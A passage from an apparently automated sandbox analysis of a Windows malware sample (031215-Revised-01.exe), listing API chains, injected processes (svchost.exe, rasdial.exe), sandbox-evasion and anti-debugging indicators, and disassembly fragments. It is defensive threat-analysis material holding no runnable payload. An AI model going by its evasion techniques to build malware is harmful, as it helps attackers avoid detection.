            Source: Binary string: wntdll.pdb source: 031215-Revised-01.exe, 00000000.00000003.1722823360.0000000003C90000.00000004.00001000.00020000.00000000.sdmp, 031215-Revised-01.exe, 00000000.00000003.1722915545.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2082183945.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1988264007.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1990149882.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.3519880403.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2084604112.0000000004AF7000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2082199541.000000000494A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000003.2048949385.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082015604.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519140397.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000003.2022839574.00000000011CB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.3520253093.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.0000000003059000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2155169663.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000A95C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.3520253093.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.0000000003059000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2155169663.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000A95C000.00000004.80000000.00040000.00000000.sdmp
            Source: 031215-Revised-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 031215-Revised-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 031215-Revised-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 031215-Revised-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 031215-Revised-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000742DE
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00090A76 push ecx; ret 0_2_00090A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02694833 push ss; retf 1_2_02694842
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0269389F push FFFFFFA4h; ret 1_2_026938AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02692100 push edi; iretd 1_2_02692101
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02683110 push eax; ret 1_2_02683112
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A987 push ebp; ret 1_2_0268A99B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02693FF7 push ss; retf 1_2_0269403C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02697FAD push esp; iretd 1_2_02697FB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02697CE3 push eax; ret 1_2_02697CE4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310225F pushad ; ret 1_2_031027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031027FA pushad ; ret 1_2_031027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD push ecx; mov dword ptr [esp], ecx1_2_031309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310283D push eax; iretd 1_2_03102858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310135E push eax; iretd 1_2_03101369
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA27FA pushad ; ret 6_2_04CA27F9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA225F pushad ; ret 6_2_04CA27F9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA283D push eax; iretd 6_2_04CA2858
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CD09AD push ecx; mov dword ptr [esp], ecx6_2_04CD09B6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA1200 push edx; retf 0004h6_2_04CA1206
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA18A7 push ds; retf 6_2_04CA198E
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA19DB push 262804DCh; retf 6_2_04CA19EA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA9939 push es; iretd 6_2_04CA9940
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA1BC7 push eax; retf 6_2_04CA1BBE
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC078C push FFFFFFA4h; ret 6_2_02BC079A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC4BD0 push eax; ret 6_2_02BC4BD1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC4E9A push esp; iretd 6_2_02BC4EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BBEFED push edi; iretd 6_2_02BBEFEE
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BD12B6 pushad ; ret 6_2_02BD12F3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC1720 push ss; retf 6_2_02BC172F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC9BBE push ss; ret 6_2_02BC9C63
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BB787F push ebp; ret 6_2_02BB7888
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_0008F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0008F98E
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00101C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00101C41
            Source: C:\Users\user\Desktop\031215-Revised-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96610
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\031215-Revised-01.exeAPI/Special instruction interceptor: Address: 1393264
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E rdtsc 1_2_0317096E
            Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 9840Jump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeAPI coverage: 4.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rasdial.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8012Thread sleep count: 132 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8012Thread sleep time: -264000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8012Thread sleep count: 9840 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8012Thread sleep time: -19680000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe TID: 8064Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe TID: 8064Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_000DDBBE
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E68EE FindFirstFileW,FindClose,0_2_000E68EE
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_000E698F
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_000DD076
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_000DD3A9
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000E9642
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000E979D
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_000E9B2B
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_000E5C97
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BCC420 FindFirstFileW,FindNextFileW,FindClose,6_2_02BCC420
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000742DE
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519091171.000000000145F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003059000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000009.00000002.2374302479.0000016F0A98C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E rdtsc 1_2_0317096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026974F3 LdrLoadDll,1_2_026974F3
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000EEAA2 BlockInput,0_2_000EEAA2
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000A2622
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000742DE
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00094CE8 mov eax, dword ptr fs:[00000030h]0_2_00094CE8
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_01393530 mov eax, dword ptr fs:[00000030h]0_2_01393530
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_013934D0 mov eax, dword ptr fs:[00000030h]0_2_013934D0
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_01391E70 mov eax, dword ptr fs:[00000030h]0_2_01391E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C310 mov ecx, dword ptr fs:[00000030h]1_2_0312C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]1_2_03208324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov ecx, dword ptr fs:[00000030h]1_2_03208324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]1_2_03208324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]1_2_03208324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150310 mov ecx, dword ptr fs:[00000030h]1_2_03150310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov ecx, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA352 mov eax, dword ptr fs:[00000030h]1_2_031FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D8350 mov ecx, dword ptr fs:[00000030h]1_2_031D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D437C mov eax, dword ptr fs:[00000030h]1_2_031D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320634F mov eax, dword ptr fs:[00000030h]1_2_0320634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]1_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]1_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]1_2_031DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]1_2_031DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov ecx, dword ptr fs:[00000030h]1_2_031DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]1_2_031DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]1_2_031D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]1_2_031D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC3CD mov eax, dword ptr fs:[00000030h]1_2_031EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B63C0 mov eax, dword ptr fs:[00000030h]1_2_031B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031663FF mov eax, dword ptr fs:[00000030h]1_2_031663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312823B mov eax, dword ptr fs:[00000030h]1_2_0312823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A250 mov eax, dword ptr fs:[00000030h]1_2_0312A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136259 mov eax, dword ptr fs:[00000030h]1_2_03136259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]1_2_031EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]1_2_031EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov eax, dword ptr fs:[00000030h]1_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov ecx, dword ptr fs:[00000030h]1_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312826B mov eax, dword ptr fs:[00000030h]1_2_0312826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320625D mov eax, dword ptr fs:[00000030h]1_2_0320625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]1_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]1_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]1_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]1_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov ecx, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
